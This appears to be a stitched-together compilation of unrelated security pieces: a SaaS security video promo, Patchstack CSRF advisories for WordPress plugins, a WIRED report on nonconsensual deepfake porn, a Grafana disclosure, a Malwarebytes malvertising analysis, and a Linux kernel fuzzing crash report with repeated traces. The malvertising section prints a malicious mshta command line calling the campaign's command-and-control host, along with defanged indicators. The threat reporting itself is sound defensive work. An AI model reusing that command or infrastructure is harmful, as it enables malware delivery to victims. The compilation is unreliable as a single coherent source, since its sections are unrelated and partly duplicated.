SaaS Security’s roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. “SaaS Security on Tap” is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (

SaaS Security / Cybersecurity

SaaS Security's roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. "**SaaS Security on Tap**" is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (maximum), and not SaaS data. This series takes a look at the key concepts within SaaS security and educates organizations on what new threat vectors need to be addressed.

****The Annual SaaS Security Survey Report: 2024 Plans and Priorities****

With the increase in SaaS application use, it's no surprise that incidents are up. The SaaS Security on Tap series covers this year's SaaS Security report which found that 55% of organizations have experienced a SaaS security incident within the last two years, including data leaks, data breaches, ransomware attacks, and malicious applications.

The report was not all doom and gloom. As Eliana V points out, companies are recognizing that manual audits and CASB deployments are only _partial_ solutions at best. A surprising 80% of companies are either using or planning on using a SaaS Security Posture Management (SSPM) tool, like Adaptive Shield, for automated configuration and SaaS security monitoring by September 2024. That should take SaaS applications to a far more secure place than they are today.

****Identity and Access Governance – Getting into the Who in SaaS Security****

SaaS Security on Tap reveals that as more organizations adopt SSPM, they are enhancing their visibility into SaaS app users. SaaS experts have come to recognize the critical nature of identity and access governance in securing SaaS apps. While much of SaaS security falls under the control of app owners, responsibility for identity and access governance falls squarely within the responsibility of the security and central IT team. They manage the company's Identity Provider (IdP) and need visibility to see which users are accessing applications, the level of access they have, and the type of users they are.

Identity security is all about ensuring that identity and access tools and policies are in place. Security teams need a high degree of visibility to know which users, including external users, have access to each application and to what extent. To fully quantify the risk emanating from users, they also need visibility into the devices used to access those applications and the ability to monitor high-privilege users.

****Uncovering the Risks & Realities of Third-Party Connected Apps****

Third-party application integrations, also known as SaaS-to-SaaS access, have also developed into a serious attack vector. These applications, which are integrated through OAuth protocols with the click of a button, improve workflows and help businesses get more out of their applications. While many of these SaaS-to-SaaS applications are harmless, they pose a significant risk. 3rd-party apps often ask for intrusive permission scopes, like Eliana V quips in the On Tap video (below), "some scopes ask for your firstborn child."

Users are granting permissions that allow read/write access, the ability to send email as a user, and most concerning, the ability to delete entire folders and drives of data. Eliana V points out that researchers found organizations with 10,000 SaaS users averaged over 6,700 applications connected to their Google Workspace, of which 89% requested medium- or high-risk permission scopes.

****A Few Words About SaaS Security On Tap****

SaaS Security on Tap provides a fast-paced, entertaining look at the challenges and solutions organizations face as they try to secure their data in SaaS apps.

Hosted by Eliana V from the SaaS Security On Tap bar, the series gets inside the issues facing security teams and their application-owner partners. Take misconfiguration management. Using entertaining analogies and powerful examples, Eliana V demonstrates the dangers of misconfigurations and the ease with which organizations err with their settings.

Check out the trailer…and like and subscribe if you want more.

**_Don't miss an episode of_** **_Saas Security On Tap_****_, the entertaining new video series that gets to the heart of SaaS security._**

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Fast Evolution of SaaS Security from 2020 to 2024 (Told Through Video)

Cross-Site Request Forgery (CSRF) vulnerability in Pixelative, Mohsin Rafique AMP WP – Google AMP For WordPress plugin <= 1.5.15 versions.

**Solution**

 No fix

No patched version is available.

qilin\_99 discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress AMP WP Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45831: WordPress AMP WP – Google AMP For WordPress plugin <= 1.5.15 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

New research shows the number of deepfake videos is skyrocketing—and the world's biggest search engines are funneling clicks to dozens of sites dedicated to the nonconsensual fakes.

Google’s and Microsoft’s search engines have a problem with deepfake porn videos. Since deepfakes emerged half a decade ago, the technology has consistently been used to abuse and harass women—using machine learning to morph someone’s head into pornography without their permission. Now the number of nonconsensual deepfake porn videos is growing at an exponential rate, fueled by the advancement of AI technologies and an expanding deepfake ecosystem.

A new analysis of nonconsensual deepfake porn videos, conducted by an independent researcher and shared with WIRED, shows how pervasive the videos have become. At least 244,625 videos have been uploaded to the top 35 websites set up either exclusively or partially to host deepfake porn videos in the past seven years, according to the researcher, who requested anonymity to avoid being targeted online.

Over the first nine months of this year, 113,000 videos were uploaded to the websites—a 54 percent increase on the 73,000 videos uploaded in all of 2022. By the end of this year, the analysis forecasts, more videos will have been produced in 2023 than the total number of every other year combined.

These startling figures are just a snapshot of how colossal the issues with nonconsensual deepfakes has become—the full scale of the problem is much larger and encompasses other types of manipulated imagery. A whole industry of deepfake abuse, which predominantly targets women and is produced without people’s consent or knowledge, has emerged in recent years. Face-swapping apps that work on still images and apps where clothes can be “stripped off a person” in a photo with just a few clicks are also highly prominent. There are likely millions of images being created with these apps.

“This is something that targets everyday people, everyday high school students, everyday adults—it's become a daily occurrence,” says Sophie Maddocks, who conducts research on digital rights and cyber-sexual violence at the University of Pennsylvania. “It would make a lot of difference if we were able to make these technologies harder to access. It shouldn't take two seconds to potentially incite a sex crime.”

The new research highlights 35 different websites, which exist to exclusively host deepfake pornography videos or incorporate the videos alongside other adult material. (It does not encompass videos posted on social media, those shared privately, or manipulated photos.) WIRED is not naming or directly linking to the websites, so as not to further increase their visibility. The researcher scraped the websites to analyze the number and duration of deepfake videos, and they looked at how people find the websites using the analytics service SimilarWeb.

Many of the websites make it clear they host or spread deepfake porn videos—often featuring the word _deepfakes_ or derivatives of it in their name. The top two websites contain 44,000 videos each, while five others host more than 10,000 deepfake videos. Most of them have several thousand videos, while some only list a few hundred. Some videos the researcher analyzed have been watched millions of times.

The research also identified an additional 300 general pornography websites that incorporate nonconsensual deepfake pornography in some way. The researcher says “leak” websites and websites that exist to repost people’s social media pictures are also incorporating deepfake images. One website dealing in photographs claims it has “undressed” people in 350,000 photos.

Measuring the full scale of deepfake videos and images online is incredibly difficult. Tracking where the content is shared on social media is challenging, while abusive content is also shared in private messaging groups or closed channels, often by people known to the victims. In September, more than 20 girls aged 11 to 17 came forward in the Spanish town of Almendralejo after AI tools were used to generate naked photos of them without their knowledge.

“There has been significant growth in the availability of AI tools for creating deepfake nonconsensual pornographic imagery, and an increase in demand for this type of content on pornography platforms and illicit online networks,” says Asher Flynn, an associate professor at Monash University, Australia, who focuses on AI and technology-facilitated abuse. This is only likely to increase with new generative AI tools.

The gateway to many of the websites and tools to create deepfake videos or images is through search. Millions of people are directed to the websites analyzed by the researcher, with 50 to 80 percent of people finding their way to the websites via search. Finding deepfake videos through search is trivial and does not require a person to have any special knowledge about what to search for.

The issue is global. Using a VPN, the researcher tested Google searches in Canada, Germany, Japan, the US, Brazil, South Africa, and Australia. In all the tests, deepfake websites were prominently displayed in search results. Celebrities, streamers, and content creators are often targeted in the videos. Maddocks says the spread of deepfakes has become “endemic” and is what many researchers first feared when the first deepfake videos rose to prominence in December 2017.

Since the tools needed to create deepfake videos emerged, they’ve become easier to use, and the quality of the videos being produced has improved. The wave of image-generation tools also offers the potential for higher-quality abusive images and, eventually, video to be created. And five years after the first deepfakes started to appear, the first laws are just emerging that criminalize the sharing of faked images.

The proliferation of these deepfake apps combined with a greater reliance on digital communications in the Covid-19 era and a "failure of laws and policies to keep pace" has created a “perfect storm,” Flynn says.

Experts say that alongside new laws, better education about the technologies is needed, as well as measures to stop the spread of tools created to cause harm. This includes action by firms that host the websites and also search engines, including Google and Microsoft’s Bing. Currently, Digital Millennium Copyright Act (DMCA) complaints are the primary legal mechanism that women have to get videos removed from websites.

Henry Ajder, a deepfake and generative AI expert who has monitored the spread of the technologies, says adding more “friction” to the process of people finding deepfake porn videos, apps to change people’s faces, and tools that specifically allow the creation of nonconsensual images can reduce the spread. “It's about trying to make it as hard as possible for someone to find,” he says. This could be search engines down-ranking results for harmful websites or internet service providers blocking sites, he says. “It's hard to feel really optimistic, given the volume and scale of these operations, and the need for platforms—which historically have not taken these issues seriously—to suddenly do so,” Ajder says.

“Like any search engine, Google indexes content that exists on the web, but we actively design our ranking systems to avoid shocking people with unexpected harmful or explicit content they don't want to see,” says Google spokesperson Ned Adriance, pointing to its page on when it removes search results. Google’s support pages say it is possible for people to request that “involuntary fake pornography” be removed. Its removal form requires people to manually submit URLs and the search terms that were used to find the content. “As this space evolves, we're actively working to add more safeguards to help protect people, based on systems we've built for other types of nonconsensual explicit imagery,” Adriance says.

Courtney Gregoire, chief digital safety officer at Microsoft, says it does not allow deepfakes, and they can be reported through its web forms. “The distribution of nonconsensual intimate imagery (NCII) is a gross violation of personal privacy and dignity with devastating effects for victims,” Gregoire says. “Microsoft prohibits NCII on our platforms and services, including the soliciting of NCII or advocating for the production or redistribution of intimate imagery without a victim’s consent.”

While the number of videos and pictures continues to skyrocket, the impact on victims can be long-lasting. “Gender-based online harassment is having an enormous chilling effect on free speech for women,” Maddocks says. As reported by WIRED, female Twitch streamers targeted by deepfakes have detailed feeling violated, being exposed to more harassment, and losing time, and some said the nonconsensual content found its way to family members.

Flynn, the Monash University professor, says her research has found “high rates” of mental health concerns—such as anxiety, depression, self-injury, and suicide—as a result of digital abuse. “The potential impacts on a person’s mental and physical health, as well as impacts on their employment, family, and social lives can be immense,” Flynn says, “regardless of whether the image is deepfaked or ‘real.’”

Deepfake Porn Is Out of Control

Grafana is an open-source platform for monitoring and observability.

The Google Sheets data source plugin for Grafana, versions 0.9.0 to 1.2.2 are vulnerable to an information disclosure vulnerability.

The plugin did not properly sanitize error messages, making it potentially expose the Google Sheet API-key that is configured for the data source.

This vulnerability was fixed in version 1.2.2.



CVE-2023-4457

Cross-Site Request Forgery (CSRF) vulnerability in Matt McKenny Stout Google Calendar plugin <= 1.2.3 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Stout Google Calendar Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45273: WordPress Stout Google Calendar plugin <= 1.2.3 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Categories: Threat Intelligence
Tags: malvertising

Tags: ads

Tags: notepad

Tags: hta

Tags: malware

Tags: google

A sophisticated threat actor has been using Google ads to deliver custom malware payloads to victims for months while flying under the radar.



(Read more...)




The post The forgotten malvertising campaign appeared first on Malwarebytes Labs.

In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

**Malicious ads for Notepad++**

The threat actor is running a campaign targeting Notepad++, a popular text editor for Windows as well as similar software programs such as PDF converters. The image below is a collage of malicious ads we observed recently, all run by the same threat actor but via different ad accounts, likely compromised.

A first level of filtering happens when the user clicks on one of these ads. This is likely an IP check that discards VPNs and other non genuine IP addresses and instead shows a decoy site:

However, intended targets will see a replica of the real Notepad++ website hosted at notepadxtreme\[.\]com:

**Fingerprinting for VM detection**

A second level of filtering happens when the user clicks on the download link where JavaScript code performs a system fingerprint. We had previously observed some malvertising campaigns check for the presence of emulators or virtual machines and this is what happens here also, although the code being used is different and more complex.

If any of the checks don't match, the user is being redirected to the legitimate Notepad++ website. Each potential victim is assigned a unique ID that will allow them to download the payload.

**Custom, time-sensitive download**

Another thing that sets apart this campaign from others is the way the payload is being downloaded. Each user is given a unique ID with the following format:

CukS1=\[10 character string\]\[13 digits\]

This is likely for tracking purposes but also to make each download unique and time sensitive.

Unlike other malvertising campaigns the payload is a _.hta_ script. It follows the same naming convention seen above with the download URL:

Notepad\_Ver\_\[10 character string\]\[13 digits\].hta

Attempting to download the file again from the same URL results in an error:

**.HTA Payload**

The .hta file we captured during our investigation was not fully weaponized. However, we were able to find another one that was uploaded to VirusTotal in early July. It uses the same naming convention and we can see the lure was "PDF Converter" instead of Notepad++.

The script is well obfuscated and shows 0 detection on VirusTotal. However, upon dynamic analysis, there is a connection to a remote domain (mybigeye\[.\]icu) on a custom port:

C:\\Windows\\SysWOW64\\mshta.exe "C:\\Windows\\System32\\mshta.exe"   
https://mybigeye .icu:52054/LXGZlAJgmvCaQfer/rWABCTDEqFVGdHIQ.html?client\_id=jurmvozdcf1687983013426#he7HAp1X4cgqv5SJykr3lRtaxijL0WPB6sdGnZC9IouwDKf8OEMQTFNbmYzU2V+/=

We also notice it uses the same client\_id stored in the filename when making that remote connection.

While we don't know what happens next, we believe this is part of malicious infrastructure used by threat actors to gain access to victims' machines using tools such as Cobalt Strike.

**Innovation makes malvertising a greater threat**

We have observed an increase in the volume of malvertising campaigns but also in their sophistication over the past several months. Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types of victims.

With a reliable malware delivery chain in hand, malicious actors can focus on improving their decoy pages and craft custom malware payloads. This is another space where we see some innovation and where security vendors are currently running behind.

Threat intelligence is a critical part of a defensive strategy to better understand the threat landscape in order to protect users. For example, tracking malicious ads allows us to quickly identify the infrastructure used by threat actors and immediately block it. Following the malware delivery chain shows us any new techniques that may bypass current security products and helps us to adjust our detections accordingly.

**Indicators of Compromise**

Ad domains:

switcodes\[.\]com  
karelisweb\[.\]com  
jquerywins\[.\]com  
mojenyc\[.\]com

Fake Notepad++ site:

notepadxtreme\[.\]com

Script C2:

mybigeye\[.\]icu

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The forgotten malvertising campaign

extract_user_to_sg in lib/scatterlist.c in the Linux kernel before 6.4.2 fails to unpin pages in a certain situation, as demonstrated by a WARNING for try_grab_page.

Hello,

When using Healer to fuzz the Linux kernel, the following crash  
was triggered on:

HEAD commit: fdf0eaf11452d72945af31804e2a1048ee1b574c (tag: v6.5-rc2)

git tree: upstream

I tried to reproduce this bug on v6.5-rc3(HEAD commit:  
6eaae198076080886b9e7d57f4ae06fa782f90ef), it still exists.

console output:  
https://drive.google.com/file/d/1Lq71bFwtEDix82PEf\_193CLG6uh1Pjj9/view?usp=drive\_link  
kernel config: https://drive.google.com/file/d/1dApy7OR4KDYdhF96ZUowZQ1r-uLYTd-0/view?usp=drive\_link  
C reproducer: https://drive.google.com/file/d/1Dkj31wwYP7p-AEJeemD3yrIUr7-VdBqF/view?usp=drive\_link  
Syzlang reproducer:  
https://drive.google.com/file/d/1ib6zTs4srKI1RnUcHG3mSZ5HeW7rZhnd/view?usp=drive\_link

If you fix this issue, please add the following tag to the commit:  
Reported-by: Yikebaer Aizezi <yikebaer61@gmail.com>

WARNING: CPU: 0 PID: 10232 at mm/gup.c:229 try\_grab\_page+0x2dd/0x3a0  
mm/gup.c:229  
Modules linked in:  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
FS: 00007fc6339a4640(0000) GS:ffff888063e00000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 0000000000000000 CR3: 000000002c3ea000 CR4: 0000000000752ef0  
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  
PKRU: 55555554  
Call Trace:  
<TASK>  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>

Modules linked in:  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
FS: 00007fc6339a4640(0000) GS:ffff888063e00000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 0000000000000000 CR3: 000000002c3ea000 CR4: 0000000000752ef0  
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000  
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400  
PKRU: 55555554  
Call Trace:  
<TASK>  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b4 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fc6339a4068 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 000000000059c0a0 RCX: 000000000047959d  
RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000006  
RBP: 000000000059c0a0 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 000000000059c0ac  
R13: 000000000000000b R14: 0000000000437250 R15: 00007fc633984000  
</TASK>  
Kernel panic - not syncing: kernel: panic\_on\_warn set ...  
CPU: 0 PID: 10232 Comm: syz-executor Tainted: G B 6.5.0-rc2 #1  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014  
Call Trace:  
<TASK>  
\_\_dump\_stack lib/dump\_stack.c:88 \[inline\]  
dump\_stack\_lvl+0x92/0xf0 lib/dump\_stack.c:106  
panic+0x570/0x620 kernel/panic.c:340  
check\_panic\_on\_warn+0x8e/0x90 kernel/panic.c:236  
\_\_warn+0xee/0x340 kernel/panic.c:673  
\_\_report\_bug lib/bug.c:199 \[inline\]  
report\_bug+0x25d/0x460 lib/bug.c:219  
handle\_bug+0x3c/0x70 arch/x86/kernel/traps.c:324  
exc\_invalid\_op+0x14/0x40 arch/x86/kernel/traps.c:345  
asm\_exc\_invalid\_op+0x16/0x20 arch/x86/include/asm/idtentry.h:568  
RIP: 0010:try\_grab\_page+0x2dd/0x3a0 mm/gup.c:229  
Code: ff be 04 00 00 00 4c 89 e7 e8 cf fa 13 00 f0 41 ff 04 24 e8 65  
96 cb ff 45 31 e4 5b 44 89 e0 5d 41 5c 41 5d c3 e8 53 96 cb ff <0f> 0b  
e8 4c 96 cb ff 41 bc f4 ff ff ff 5b 44 89 e0 5d 41 5c 41 5d  
RSP: 0018:ffffc9000e99f268 EFLAGS: 00010202  
RAX: 0000000000002f80 RBX: ffffea00003ae340 RCX: ffffc90002d79000  
RDX: 0000000000040000 RSI: ffffffff81ad81ed RDI: ffffea00003ae374  
RBP: ffffea00003ae340 R08: 0000000000000000 R09: fffff94000075c6e  
R10: ffffea00003ae377 R11: 0000000000000000 R12: ffffea00003ae374  
R13: 0000000000210052 R14: ffffea00003ae340 R15: 000000000eb8d225  
follow\_page\_pte+0x18c/0x1610 mm/gup.c:651  
follow\_pmd\_mask mm/gup.c:727 \[inline\]  
follow\_pud\_mask mm/gup.c:765 \[inline\]  
follow\_p4d\_mask mm/gup.c:782 \[inline\]  
follow\_page\_mask+0x2e4/0xbd0 mm/gup.c:839  
\_\_get\_user\_pages+0x3fa/0xcf0 mm/gup.c:1256  
\_\_get\_user\_pages\_locked mm/gup.c:1487 \[inline\]  
get\_user\_pages\_unlocked+0x183/0x580 mm/gup.c:2387  
hva\_to\_pfn\_slow arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2536 \[inline\]  
hva\_to\_pfn+0x198/0xbc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2674  
\_\_gfn\_to\_pfn\_memslot+0x202/0x3e0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:2736  
\_\_kvm\_faultin\_pfn arch/x86/kvm/mmu/mmu.c:4329 \[inline\]  
kvm\_faultin\_pfn+0x21b/0x12d0 arch/x86/kvm/mmu/mmu.c:4365  
kvm\_tdp\_mmu\_page\_fault arch/x86/kvm/mmu/mmu.c:4503 \[inline\]  
kvm\_tdp\_page\_fault+0x167/0x4d0 arch/x86/kvm/mmu/mmu.c:4549  
kvm\_mmu\_do\_page\_fault arch/x86/kvm/mmu/mmu\_internal.h:320 \[inline\]  
kvm\_mmu\_page\_fault+0x2f4/0x1a40 arch/x86/kvm/mmu/mmu.c:5756  
handle\_ept\_violation+0x20a/0x620 arch/x86/kvm/vmx/vmx.c:5760  
\_\_vmx\_handle\_exit arch/x86/kvm/vmx/vmx.c:6539 \[inline\]  
vmx\_handle\_exit+0x4a1/0x18d0 arch/x86/kvm/vmx/vmx.c:6556  
vcpu\_enter\_guest arch/x86/kvm/x86.c:10848 \[inline\]  
vcpu\_run+0x24b6/0x44b0 arch/x86/kvm/x86.c:10951  
kvm\_arch\_vcpu\_ioctl\_run+0x416/0x1830 arch/x86/kvm/x86.c:11172  
kvm\_vcpu\_ioctl+0x4de/0xcc0 arch/x86/kvm/../../../virt/kvm/kvm\_main.c:4112  
vfs\_ioctl fs/ioctl.c:51 \[inline\]  
\_\_do\_sys\_ioctl fs/ioctl.c:870 \[inline\]  
\_\_se\_sys\_ioctl fs/ioctl.c:856 \[inline\]  
\_\_x64\_sys\_ioctl+0x173/0x1e0 fs/ioctl.c:856  
do\_syscall\_x64 arch/x86/entry/common.c:50 \[inline\]  
do\_syscall\_64+0x35/0xb0 arch/x86/entry/common.c:80  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x47959d  
